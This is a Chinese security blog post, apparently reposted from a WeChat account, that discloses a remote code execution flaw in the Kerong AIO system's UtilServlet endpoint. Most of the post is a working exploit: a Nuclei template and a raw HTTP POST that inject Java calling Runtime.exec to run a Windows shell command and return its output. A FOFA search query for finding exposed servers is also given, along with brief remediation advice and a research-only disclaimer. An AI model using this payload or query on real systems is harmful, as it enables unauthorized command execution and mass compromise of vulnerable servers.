科荣AIO系统UtilServlet接口处存在代码执行漏洞【POC】

admin 2024年11月25日16:35:36评论18 views字数 1785阅读5分57秒阅读模式

漏洞描述:

科荣AIO系统UtilServlet接口处存在代码执行漏。攻击者可能利用此漏洞执行恶意命令,导致系统执行未授权的操作,获取服务器权限。

01—Nuclei POC

id: kerong-AIO-UtilServlet-RCE

info:
  name: 科荣AIO系统UtilServlet接口处存在代码执行漏

  author: kingkong
  severity: high
  metadata:
    fofa-query: body="changeAccount('8000')"

http:
  - raw:
      - |
        POST /UtilServlet HTTP/1.1
        Host: {{Hostname}}
        User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2
        Accept-Encoding: gzip, deflate, br
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length:322

        operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
              - "content_length>=3  && content_length<=30 && status_code==200"
        condition: and
02—搜索语法
FOFA:body="changeAccount('8000')"

科荣AIO系统UtilServlet接口处存在代码执行漏洞【POC】

界面如下

科荣AIO系统UtilServlet接口处存在代码执行漏洞【POC】

03—漏洞复现

科荣AIO系统UtilServlet接口处存在代码执行漏洞【POC】

漏洞检测POC

POST /UtilServlet HTTP/1.1Host: User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2Accept-Encoding: gzip, deflate, brConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length:322operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field

neclei批量检测截图

科荣AIO系统UtilServlet接口处存在代码执行漏洞【POC】

04—修复建议

1、输入验证:对所有用户输入进行严格的验证,确保只接受预期的格式。
2、使用安全的API:使用安全的库或API来执行命令,避免直接调用系统命令。
3、最小权限原则:确保应用程序仅在必要的权限下运行,限制可执行的命令。
4、输出编码:对输出进行编码,以防止注入攻击。

 

原文始发于微信公众号(脚本小子):科荣AIO系统UtilServlet接口处存在代码执行漏【漏洞复现|附nuclei-POC】洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月25日16:35:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   科荣AIO系统UtilServlet接口处存在代码执行漏洞【POC】https://cn-sec.com/archives/3434637.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息